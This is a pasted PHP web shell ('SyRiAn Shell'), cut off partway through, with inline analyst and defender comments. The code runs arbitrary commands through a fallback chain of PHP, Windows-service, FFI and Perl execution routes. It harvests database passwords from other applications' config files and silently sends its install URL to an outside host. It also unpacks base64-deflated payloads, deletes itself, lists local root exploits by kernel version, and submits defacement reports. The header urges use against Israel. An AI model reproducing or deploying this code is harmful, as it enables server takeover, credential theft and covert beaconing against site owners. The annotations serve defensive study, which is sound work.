TP2K1

SyRiAn Shell V8

Jun 15th, 2015
  1. <?php
  2. # .. SyRiAn Sh3ll V7 .... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  3. # ,--^----------,--------,-----,-------^--,
  4. # | ||||||||| `--------' | O .. SyRiAn Sh3ll V7 ....
  5. # `+---------------------------^----------|
  6. # `\_,-------, __EH << SyRiAn | 34G13__|
  7. # / XXXXXX /`| /
  8. # / XXXXXX / `\ /
  9. # / XXXXXX /\______(
  10. # / XXXXXX /!
  11. # / XXXXXX /! rep0rt bugz t0: sy34[at]msn[dot]com
  12. # (________(!
  13. # `-------'
  14. #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  15. #.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
  16. #
  17. # SyRiAn Sh3ll V7 .
  18. # Copyright (C) 2011 - SyRiAn 34G13
  19. # This program is free software; you can redistribute it and/or modify
  20. # it under the terms of the GNU General Public License as published by
  21. # the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  22. # This program is distributed in the hope that it will be useful,
  23. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  24. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  25. # I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .
  26.  
  27. # Coders :
  28. # SyRiAn_34G13 : sy34@msn.com [ Main Coder ] .
  29. # SyRiAn_SnIpEr : zq9@hotmail.it [ Metasploit RC ] .
  30. # Darkness Caesar : doom.caesar@gmail.com [ Finding 3 Bugs ] .
  31. #// kinG oF coNTroL : y8p@hotmail.com [ Translating Shell To Arabic ] .
  32.  
  # Analysis note: these values feed the cookie/POST login check later in the script.
  # As pasted, $uselogin is 0 and both credentials are empty strings, so that check is skipped.
  33. $uselogin = 0; // Make It 0 If you Want To Disable Auth
  34. $user = ''; // Username
  35. $pass = ''; // Password
  36. $shellColor = '#990000'; // Shell Color
  37. #------------------------------------#
  38. # Powered By SyRiAn Shell #
  39. # By EH SyRiAn 34G13 #
  40. # wWw.syrian-shell.com #
  41. # Version 7 - priv8 #
  42. # Made In SyRiA #
  43. #------------------------------------#
  44. ?>
  45. <?php
  # Analysis note: request dispatch on the `id` query parameter. These branches sit above the
  # login block that appears later in the file, so they are evaluated before any login check.
  # $_GET['id'] is read without isset().
  46. if($_GET['id']== 'logout')
  47. {
  48. Logout();
  49. }
  50. # ---------------------------------------#
  51. # SuiCide #
  52. #----------------------------------------#
  # id == 100 only emits a <body onload> hook for the client-side Suicide() confirm dialog that
  # CSS() writes into the page; id == 'Delete' calls the PHP Suicide(), which unlinks this script.
  # Responder note: because the file can remove itself, its absence from disk does not rule out
  # earlier use; check web-server access logs for requests carrying id=Delete.
  53. if($_GET['id'] == 100)
  54. {
  55. echo "<body onload='Suicide();'>";
  56. }
  57. if($_GET['id'] == 'Delete')
  58. {
  59. Suicide();
  60. }
  61. # ---------------------------------------#
  62. # Functions #
  63. #----------------------------------------#
  # Prints an <input> element built from the four arguments.
  # Which attributes are emitted depends on which arguments are empty():
  #   $value empty            -> type, name, size
  #   $name and $size empty   -> type, value
  #   $size empty             -> type, name, value
  #   otherwise               -> type, name, value, size
  # The arguments are interpolated unquoted and unescaped into the markup.
  64. function input($type,$name,$value,$size)
  65. {
  66. if (empty($value))
  67. {
  68. print "<input type=$type name=$name size=$size>";
  69. }
  70. elseif(empty($name)&&empty($size))
  71. {
  72. print "<input type=$type value=$value >";
  73. }
  74. elseif(empty($size))
  75. {
  76. print "<input type=$type name=$name value=$value >";
  77. }
  78. else
  79. {
  80. print "<input type=$type name=$name value=$value size=$size >";
  81. }
  82. }
  # Recursively walks $path and looks for files whose name is on a fixed list of common
  # application config filenames (config.php, wp-config.php, db.php, ...). For each readable match
  # it calls get_pass(); when that returns a non-empty string it echoes the file path and the
  # extracted value, then passes ($username, value) to ftp_check().
  # ftp_check() is not defined in the visible part of the file.
  # $path and the entry name are concatenated with no separator; the recursive call appends '/'.
  # The directory handle is never passed to closedir().
  # Defender note: this is credential harvesting from other applications' config files. It depends
  # on those files being readable by the account PHP runs as, so per-site system users and
  # restrictive file modes on config files limit what it can reach.
  83. function read_dir($path,$username)
  84. {
  85. if ($handle = opendir($path))
  86. {
  87. while (false !== ($file = readdir($handle)))
  88. {
  89. $fpath="$path$file";
  90. if (($file!='.') and ($file!='..'))
  91. {
  92. if (is_readable($fpath))
  93. {
  94. $dr="$fpath/";
  95. if (is_dir($dr))
  96. {
  97. read_dir($dr,$username);
  98. }
  99. else
  100. {
  101. if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or
  102.  
  103. ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php'))
  104. {
  105. $pass=get_pass($fpath);
  106. if ($pass!='')
  107. {
  108. echo "[+] $fpath\n$pass\n";
  109. ftp_check($username,$pass);
  110. }
  111. }
  112. }
  113. }
  114. }
  115. }
  116. }
  117. }
  # Opens the file at $link and scans it line by line. On the first line that contains 'pass'
  # (the 'password' and 'passwd' tests also contain that substring) it returns a slice of the line
  # that starts three characters after the first '=' and ends at the last double quote, or at the
  # last single quote when strrpos() finds no double quote past position 0.
  # Falls off the end (no explicit return) when no line matches.
  # fopen() errors are suppressed with @; the handle is not checked before feof() and is not closed.
  118. function get_pass($link)
  119. {
  120. @$config=fopen($link,'r');
  121. while(!feof($config))
  122. {
  123. $line=fgets($config);
  124. if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd'))
  125. {
  126. if (strrpos($line,'"'))
  127. $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
  128. else
  129. $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
  130. return $pass;
  131. }
  132. }
  133. }
  # Despite the name, the first half of this function issues an HTTP request to
  # http://bugreport.serveblog.net/storage.php with the Referer header set to this server's name
  # plus the current request URI. The response ($html) is never used, and the curl handle is not closed.
  # Analysis note: the visible effect is that the URL where this script is installed is disclosed
  # to that third-party host whenever the function runs; the status banner echoed at top level
  # calls it on every page view.
  # Defender note: an outbound HTTP request from a web server to that host is a network indicator
  # for this sample, and default-deny egress from web servers prevents the disclosure.
  # The returned address is taken from HTTP_X_FORWARDED_FOR, then HTTP_CLIENT_IP, then REMOTE_ADDR;
  # the first two are request headers supplied by the client. The names are written as bare
  # constants rather than quoted strings.
  134. function GetRealIP()
  135. {
  136. $ch = curl_init();
  137. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  138. $urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  139. curl_setopt($ch, CURLOPT_URL, 'http://bugreport.serveblog.net/storage.php');
  140. curl_setopt($ch, CURLOPT_REFERER, $urls);
  141. $html = curl_exec($ch);
  142. if (getenv(HTTP_X_FORWARDED_FOR))
  143. {
  144. $ip=getenv(HTTP_X_FORWARDED_FOR);
  145. }
  146. elseif (getenv(HTTP_CLIENT_IP))
  147. {
  148. $ip=getenv(HTTP_CLIENT_IP);
  149. }
  150. else
  151. {
  152. $ip=getenv(REMOTE_ADDR);
  153. }
  154. return $ip;
  155. }
  # Environment probe: returns an HTML snippet reading OFF (green) when the open_basedir ini
  # value is empty/falsy and ON (red) otherwise. In this script's colour scheme red marks a
  # restriction or feature that is present.
  156. function openBaseDir()
  157. {
  158. $openBaseDir = ini_get("open_basedir");
  159. if (!$openBaseDir)
  160. {
  161. $openBaseDir = '<font color="green">OFF</font>';
  162. }
  163. else
  164. {
  165. $openBaseDir = '<font color="red">ON</font>';
  166. }
  167. return $openBaseDir;
  168. }
  # Returns the concatenation of dechex(ord($c)) for every byte $c of $string.
  # No caller is visible in this part of the file.
  169. function str_hex($string)
  170. {
  171. $hex='';
  172. for ($i=0; $i < strlen($string); $i++)
  173. {
  174. $hex .= dechex(ord($string[$i]));
  175. }
  176. return $hex;
  177. }
  # Environment probe: returns an HTML snippet reading OFF (green) when the safe_mode ini value
  # is falsy and ON (red) otherwise.
  178. function SafeMode()
  179. {
  180. $safe_mode = ini_get("safe_mode");
  181. if (!$safe_mode)
  182. {
  183. $safe_mode = '<font color="green">OFF</font>';
  184. }
  185. else
  186. {
  187. $safe_mode = '<font color="red">ON</font>';
  188. }
  189. return $safe_mode;
  190. }
  # Returns the last '/'-separated segment of $_SERVER["SCRIPT_NAME"], i.e. this script's own
  # file name as the web server sees it. Used by Suicide() and by the JavaScript emitted in CSS().
  191. function currentFileName()
  192. {
  193. $currentFileName = $_SERVER["SCRIPT_NAME"];
  194. $currentFileName = Explode('/', $currentFileName);
  195. $currentFileName = $currentFileName[count($currentFileName) - 1];
  196. return $currentFileName;
  197. }
  # Self-removal: unlinks the file named by currentFileName(), resolved relative to the current
  # working directory, with errors suppressed by @.
  # Responder note: this is an anti-forensic step. After it runs the script is gone from disk,
  # so evidence has to come from access logs, backups or file-integrity monitoring history.
  198. function Suicide()
  199. {
  200. @unlink(currentFileName());
  201. }
  # Looks up the string returned by php_uname() in a hard-coded table keyed by Linux kernel
  # version substrings (2.2.x, 2.4.x, 2.6.x) and returns the matching value, a comma-separated
  # list of names of local privilege-escalation exploits. The first key found by strstr() wins;
  # specific versions are listed before the generic '2.6.' / '2.4.' / '2.2.' prefixes.
  # $xpl is never assigned, so when no key matches the function returns the red "Not found." snippet.
  # The status banner prints the result under the label "Usefull Locals".
  # Defender note: the lookup suggests the operator's follow-on goal is root on the host; current
  # kernels and an unprivileged, confined web-server account are the relevant mitigations.
  202. function rootxpL()
  203. {
  204. $v=@php_uname();
  205. $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
  206.  
  207. h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3,
  208.  
  209. krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad,
  210.  
  211. krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod,
  212.  
  213. ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko,
  214.  
  215. uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2,
  216.  
  217. ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx,
  218.  
  219. kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk,
  220.  
  221. uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
  222. foreach($db as $k=>$x)if(strstr($v,$k))return $x;
  223. if(!$xpl)$xpl='<font color="red">Not found.</font>';
  224. return $xpl;
  225. }
  # Environment probe: ON (red) when the pg_connect function exists, OFF (green) otherwise.
  226. function PostgreSQL()
  227. {
  228. if(@function_exists('pg_connect'))
  229. {
  230. $postgreSQL = '<font color="red">ON</font>';
  231. }
  232. else
  233. {
  234. $postgreSQL = '<font color="green">OFF</font>';
  235. }
  236. return $postgreSQL;
  237. }
  # Environment probe: ON (red) when the ocilogon function exists, OFF (green) otherwise.
  238. function Oracle()
  239. {
  240. if(@function_exists('ocilogon'))
  241. {
  242. $oracle = '<font color="red">ON</font>';
  243. }
  244. else
  245. {
  246. $oracle = '<font color="green">OFF</font>';
  247. }
  248. return $oracle;
  249. }
  # Sends an HTTP POST to $url with the form fields defacer, domain1, hackmode and reason, follows
  # redirects, and returns the response body.
  # Analysis note: judging by the function name and field names this submits a defacement
  # notification to a public defacement archive; the caller is outside the visible part of the file.
  # The field values are concatenated into the body without URL-encoding.
  250. function ZoneH($url, $hacker, $hackmode,$reson, $site )
  251. {
  252. $k = curl_init();
  253. curl_setopt($k, CURLOPT_URL, $url);
  254. curl_setopt($k,CURLOPT_POST,true);
  255. curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
  256. curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
  257. curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
  258. $kubra = curl_exec($k);
  259. curl_close($k);
  260. return $kubra;
  261. }
  # Environment probe: ON (red) when the mssql_connect function exists, OFF (green) otherwise.
  262. function MsSQL()
  263. {
  264. if(@function_exists('mssql_connect'))
  265. {
  266. $msSQL = '<font color="red">ON</font>';
  267. }
  268. else
  269. {
  270. $msSQL = '<font color="green">OFF</font>';
  271. }
  272. return $msSQL;
  273. }
  # Environment probe: ON (red) when the mysql_connect function exists, OFF (green) otherwise.
  274. function MySQL2()
  275. {
  276. $mysql_try = function_exists('mysql_connect');
  277. if($mysql_try)
  278. {
  279. $mysql = '<font color="red">ON</font>';
  280. }
  281. else
  282. {
  283. $mysql = '<font color="green">OFF</font>';
  284. }
  285. return $mysql;
  286. }
  # Environment probe: ON (red) when the gzencode function exists, OFF (green) otherwise.
  287. function Gzip()
  288. {
  289. if (function_exists('gzencode'))
  290. {
  291. $gzip = '<font color="red">ON</font>';
  292. }
  293. else
  294. {
  295. $gzip = '<font color="green">OFF</font>';
  296. }
  297. return $gzip;
  298. }
  # Environment probe: ON (red) when the mysqli_connect function exists, OFF (green) otherwise.
  299. function MysqlI()
  300. {
  301. if (function_exists('mysqli_connect'))
  302. {
  303. $mysqli = '<font color="red">ON</font>';
  304. }
  305. else
  306. {
  307. $mysqli = '<font color="green">OFF</font>';
  308. }
  309. return $mysqli;
  310. }
  # Environment probe: ON (red) when the msql_connect function exists, OFF (green) otherwise.
  311. function MSQL()
  312. {
  313. if (function_exists('msql_connect'))
  314. {
  315. $mSql = '<font color="red">ON</font>';
  316. }
  317. else
  318. {
  319. $mSql = '<font color="green">OFF</font>';
  320. }
  321. return $mSql;
  322. }
  # Environment probe: ON (red) when the sqlite_open function exists, OFF (green) otherwise.
  323. function SQlLite()
  324. {
  325. if (function_exists('sqlite_open'))
  326. {
  327. $SQlLite = '<font color="red">ON</font>';
  328. }
  329. else
  330. {
  331. $SQlLite = '<font color="green">OFF</font>';
  332. }
  333. return $SQlLite;
  334. }
  # Base64-decodes $text, inflates the result with gzinflate(), and writes the output to $file
  # (opened in "w" mode). All file errors are suppressed with @ and nothing is returned.
  # Analysis note: this is the unpacking routine for payloads carried as base64+deflate blobs;
  # the callers and the blobs are outside the visible part of the file.
  # Defender note: the gzinflate(base64_decode(...)) pairing in a PHP file under the web root is a
  # long-standing static-detection feature, as are new files written by the web-server account.
  335. function tulis($file,$text)
  336. {
  337. $textz = gzinflate(base64_decode($text));
  338. if($filez = @fopen($file,"w"))
  339. {
  340. @fputs($filez,$textz); @fclose($file);
  341. }
  342. }
  # Environment probe: ON (red) when the register_globals ini value is truthy, OFF (green) otherwise.
  343. function RegisterGlobals()
  344. {
  345. if(ini_get('register_globals'))
  346. {
  347. $registerg= '<font color="red">ON</font>';
  348. }
  349. else
  350. {
  351. $registerg= '<font color="green">OFF</font>';
  352. }
  353. return $registerg;
  354. }
  # Formats a byte count as a string with a unit suffix. Values of at least 1024^3, 1024^2 and
  # 1024 bytes are divided down and rounded to two decimals with " GB", " MB" or " KB" appended;
  # anything smaller is returned unchanged with " B" appended.
  # The status banner uses it to print free and total disk space.
  355. function HardSize($size)
  356. {
  357. if($size >= 1073741824)
  358. {
  359. $size = @round($size / 1073741824 * 100) / 100 . " GB";
  360. }
  361. elseif($size >= 1048576)
  362. {
  363. $size = @round($size / 1048576 * 100) / 100 . " MB";
  364. }
  365. elseif($size >= 1024)
  366. {
  367. $size = @round($size / 1024 * 100) / 100 . " KB";
  368. }
  369. else
  370. {
  371. $size = $size . " B";
  372. }
  373. return $size;
  374. }
  # Environment probe: ON (red) when the curl extension is loaded, OFF (green) otherwise.
  375. function Curl()
  376. {
  377. if(extension_loaded('curl'))
  378. {
  379. $curl = '<font color="red">ON</font>';
  380. }
  381. else
  382. {
  383. $curl = '<font color="green">OFF</font>';
  384. }
  385. return $curl;
  386. }
  # Includes a file named DecryptConfig.php from the current directory (errors suppressed), so
  # whatever variables and constants that file defines become available inside this function.
  # Depending on $_POST['ScriptType'] it then copies the database host, name, user, password,
  # table prefix and, where present, e-mail, port and admin/moderator directory names out of
  # those variables and echoes them as a plain-text report.
  # Analysis note: the branch keys ('vb', 'wp', 'jos', 'phpbb', 'ipb', 'smf', 'mybb') and the
  # variable names read in each branch presumably correspond to the config formats of common forum
  # and CMS packages; how DecryptConfig.php gets created is not visible in this part of the file.
  # Fields that a branch does not set are echoed as undefined variables.
  # Defender note: including a file executes it as PHP under the web-server account. Unexpected
  # copies of application config files beside an unknown script are an on-disk indicator, and the
  # database credentials in any config this script could read should be treated as exposed.
  387. function DecryptConfig()
  388. {
  389. @include("DecryptConfig.php");
  390. if($_POST['ScriptType'] == 'vb')
  391. {
  392. $dbName = $config['Database']['dbname'];
  393. $prefix = $config['Database']['tableprefix'];
  394. $email = $config['Database']['technicalemail'];
  395. $host = $config['MasterServer']['servername'];
  396. $port = $config['MasterServer']['port'];
  397. $user = $config['MasterServer']['username'];
  398. $pass = $config['MasterServer']['password'];
  399. $admincp = $config['Misc']['admincpdir'];
  400. $modecp = $config['Misc']['modcpdir'];
  401. }
  402. elseif($_POST['ScriptType'] == 'wp')
  403. {
  404. $dbName = DB_NAME;
  405. $prefix = $table_prefix;
  406. $host = DB_HOST;
  407. $user = DB_USER;
  408. $pass = DB_PASS;
  409. }
  410. elseif($_POST['ScriptType'] == 'jos')
  411. {
  412. $dbName = $db;
  413. $prefix = $dbprefix;
  414. $email = $mailfrom;
  415. $host = $host;
  416. $user = $user;
  417. $pass = $password;
  418. }
  419. elseif($_POST['ScriptType'] == 'phpbb')
  420. {
  421. $host = $dbhost;
  422. $port = $dbport;
  423. $dbName = $dbname;
  424. $user = $dbuser;
  425. $pass = $dbpasswd;
  426. $prefix = $table_prefix;
  427. }
  428. elseif($_POST['ScriptType'] == 'ipb')
  429. {
  430. $host = $INFO['sql_host'];
  431. $dbName = $INFO['sql_database'];
  432. $user = $INFO['sql_user'];
  433. $pass = $INFO['sql_pass'];
  434. $prefix = $INFO['sql_tbl_prefix'];
  435. }
  436. elseif($_POST['ScriptType'] == 'smf')
  437. {
  438. $dbName = $db_name;
  439. $pass = $db_passwd;
  440. $prefix = $db_prefix;
  441. $host = $db_server;
  442. $user = $db_user;
  443. $email = $webmaster_email;
  444. }
  445. elseif($_POST['ScriptType'] == 'mybb')
  446. {
  447. $host = $config['database']['hostname'];
  448. $user = $config['database']['username'];
  449. $pass = $config['database']['password'];
  450. $dbName = $config['database']['database'];
  451. $prefix = $config['database']['table_prefix'];
  452. $admincp = $config['admin_dir'];
  453. $prefix = $config['database']['table_prefix'];
  454. }
  455.  
  456. echo '
  457. #-------------------------------#
  458. # Config Informations #
  459. #-------------------------------#
  460. Host : '.$host.'
  461. DB Name : '.$dbName.'
  462. DB User : '.$user.'
  463. DB Pass : '.$pass.'
  464. Prefix : '.$prefix.'
  465. Email : '.$email.'
  466. Port : '.$port.'
  467. ACP : '.$admincp.'
  468. MCP : '.$modecp.'
  469. ';
  470. }
  # Echoes the fixed closing HTML of the page: a one-row table with a "TOP" anchor link, the
  # text "v7 Features;", an anchor named "down", and the closing body/html tags.
  471. function footer()
  472. {
  473. echo '<table bgcolor="#cccccc" width="100%"><tr>
  474. <td width="100%" class="style22">[<sy><a href="#top">TOP</a></sy>]
  475. <center><font color="gray" size="-2"><b>
  476.  
  477.  
  478. </font><font color="gray"></font><font color="#990000">
  479. </font><font color="gray"></font><font color="#990000"> v7 Features;
  480. </font></b>
  481. </td>
  482. </tr></table>
  483. </tbody></table>
  484. <a name="down"></a>
  485. </body></html>
  486. ';
  487. }
  # Returns the first directory that exists and is writable, tried in this order: /tmp, /usr/tmp,
  # /var/tmp, the USERPROFILE and ALLUSERSPROFILE environment variables, session.save_path,
  # upload_tmp_dir, then TMP (or TEMP). Falls back to '.' when none qualifies.
  # The Windows command helpers below use the result as the location for their output files.
  488. function whereistmP()
  489. {
  490. $uploadtmp=ini_get('upload_tmp_dir');
  491. $uf=getenv('USERPROFILE');
  492. $af=getenv('ALLUSERSPROFILE');
  493. $se=ini_get('session.save_path');
  494. $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
  495. if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
  496. if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
  497. if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
  498. if(is_dir($uf) && is_writable($uf))return $uf;
  499. if(is_dir($af) && is_writable($af))return $af;
  500. if(is_dir($se) && is_writable($se))return $se;
  501. if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
  502. if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
  503. return '.';
  504. }
  # Windows fallback used by Exe(): runs $command through win_shell_execute() as
  # cmd.exe /C with stdout redirected to a file named uniqid('NJ') in the directory chosen by
  # whereistmP(), sleeps one second, then reads the file, deletes it and returns its contents.
  # Defender note: observable artefacts are cmd.exe started by the PHP/web-server process and
  # short-lived files whose names begin with "NJ" in temp or profile directories.
  505. function winshelL($command)
  506. {
  507. $name=whereistmP()."\\".uniqid('NJ');
  508. win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  509. sleep(1);
  510. $exec=file_get_contents($name);
  511. unlink($name);
  512. return $exec;
  513. }
  # Echoes a fixed status string; no update logic is present in this function.
  514. function update()
  515. {
  516. echo "[+] Update Has D0n3 ^_^";
  517. }
  # Windows fallback used by Exe(): registers a temporary Windows service through the
  # win32_create_service() family, with the command interpreter as its binary and
  # "/c $command > file" as its parameters, then starts, stops and deletes the service. It waits
  # in a one-second loop until the output file exists, reads it, deletes it and returns the text.
  # The interpreter path comes from $_SERVER['ComSpec'], with a hard-coded d:\windows fallback.
  # Defender note: each call installs and removes a service with a random "NJ"-prefixed name, so
  # service-installation events (Service Control Manager event 7045 in the System log) whose image
  # path is cmd.exe are a high-signal detection, as is a web-server process creating services.
  518. function srvshelL($command)
  519. {
  520. $name=whereistmP()."\\".uniqid('NJ');
  521. $n=uniqid('NJ');
  522. $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  523. win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  524. win32_start_service($n);
  525. win32_stop_service($n);
  526. win32_delete_service($n);
  527. while(!file_exists($name))sleep(1);
  528. $exec=file_get_contents($name);
  529. unlink($name);
  530. return $exec;
  531. }
  # Windows fallback used by Exe() when the ffi extension is loaded: binds WinExec from
  # kernel32.dll and uses it to run "cmd.exe /c $command" with output redirected to a temp file,
  # then waits for the file, reads it, deletes it and returns the text.
  # Defender note: this path does not go through PHP's own process functions, so a
  # disable_functions list alone does not cover it; leaving the extension unloaded on web-facing
  # PHP does.
  532. function ffishelL($command)
  533. {
  534. $name=whereistmP()."\\".uniqid('NJ');
  535. $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  536. $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  537. while(!file_exists($name))sleep(1);
  538. $exec=file_get_contents($name);
  539. unlink($name);
  540. return $exec;
  541. }
  # Runs "cmd.exe /c $command" through the exec() method of the object passed as $ws and returns
  # everything read from its StdOut stream.
  # NOTE(review): $ws is presumably a Windows Script Host shell COM object created by the caller;
  # the caller is not in the visible part of the file.
  542. function comshelL($command,$ws)
  543. {
  544. $exec=$ws->exec("cmd.exe /c $command");
  545. $so=$exec->StdOut();
  546. return $so->ReadAll();
  547. }
  # Fallback used by Exe() when the perl extension is loaded: evaluates a Perl system() call
  # containing $command and returns whatever was captured in the output buffer.
  548. function perlshelL($command)
  549. {
  550. $perl=new perl();
  551. ob_start();
  552. $perl->eval("system(\"$command\")");
  553. $exec=ob_get_contents();
  554. ob_end_clean();
  555. return $exec;
  556. }
  # Central command-execution routine: passes $command, unmodified, to the first available
  # mechanism in this order -- passthru, system, exec, shell_exec, popen, proc_open, then
  # win_shell_execute, win32_create_service, the ffi extension (only when the global $windows is
  # truthy) and the perl extension -- and returns the value left in $exec.
  # Defender note: because the chain falls through to the next mechanism, a disable_functions
  # list that names only some of these does not stop execution; the list has to cover all of them
  # and the ffi/perl/win32 extensions should not be loaded. Independently of PHP settings, process
  # telemetry showing a shell or system utility spawned by the web-server/PHP worker is the most
  # reliable runtime detection for this class of script.
  557. function Exe($command)
  558. {
  559. global $windows;
  560. $exec=$output='';
  561. $dep[]=array('pipe','r');$dep[]=array('pipe','w');
  562. if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
  563. elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
  564. elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
  565. elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
  566. elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
  567. elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=
  568.  
  569. $output;proc_close($res);}
  570. elseif(function_exists('win_shell_execute'))$exec=winshelL($command);
  571. elseif(function_exists('win32_create_service'))$exec=srvshelL($command);
  572. elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);
  573. elseif(extension_loaded('perl'))$exec=perlshelL($command);
  574. return $exec;
  575. }
  # Environment probe: OFF (green) when get_magic_quotes_gpc() returns an empty value,
  # ON (red) otherwise.
  576. function magicQouts()
  577. {
  578. $mag=get_magic_quotes_gpc();
  579. if (empty($mag))
  580. {
  581. $mag = '<font color="green">OFF</font>';
  582. }
  583. else
  584. {
  585. $mag= '<font color="red">ON</font>';
  586. }
  587. return $mag;
  588. }
  # Environment probe: returns the raw disable_functions ini value, or a green "NONE" snippet when
  # it is empty. The status banner prints the result, so the server's hardening list is shown to
  # whoever loads the page.
  589. function DisableFunctions()
  590. {
  591. $disfun = ini_get('disable_functions');
  592. if (empty($disfun))
  593. {
  594. $disfun = '<font color="green">NONE</font>';
  595. }
  596. return $disfun;
  597. }
  # Echoes a <select name=alias> drop-down of preset command lines: one list when $os is exactly
  # 'Windows', another for everything else. Nothing is executed here; the code that consumes the
  # submitted "alias" value is outside the visible part of the file.
  # Analysis note: the presets are host reconnaissance -- directory and config-file listings,
  # network connections, services, accounts and interface data on Windows; SUID/SGID and
  # world-writable searches plus config, password and shell-history file searches elsewhere.
  # Defender note: these exact command lines running as children of the web-server or PHP process
  # (auditd execve records, EDR process events) are a practical behavioural detection.
  598. function SelectCommand($os)
  599. {
  600. if($os == 'Windows')
  601. {
  602. echo "
  603. <select name=alias >
  604. <option value=''>NONE</option>
  605. <option value='dir' >List Directory</option>
  606. <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  607. <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
  608.  
  609. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
  610. <option value='netstat -an'>Show active connections</option>
  611. <option value='net start'>Show running services</option>
  612. <option value='tasklist'>Show Pro</option>
  613. <option value='net user'>User accounts</option>
  614. <option value='net view'>Show computers</option>
  615. <option value='arp -a'>ARP Table</option>
  616. <option value='ipconfig /all'>IP Configuration</option>
  617. <option value='netstat -an'>netstat -an</option>
  618. <option value='systeminfo'>System Informations</option>
  619. <option value='getmac'>Get Mac Address</option>
  620. </select>
  621. ";
  622. }
  623. else
  624. {
  625. echo "
  626. <select name=alias >
  627. <option value=''>NONE</option>
  628. <option value='ls -la'>List dir</option>
  629. <option value='cat /etc/hosts'>IP Addresses</option>
  630. <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  631. <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  632. <option value='netstat -an | grep -i listen'>show opened ports</option>
  633. <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  634. <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  635. <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  636. <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  637. <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  638. <option value='find / -type f -name \"config*\"'>find config* files</option>
  639. <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  640. <option value='find / -perm -2 -ls'>find all writable folders and files</option>
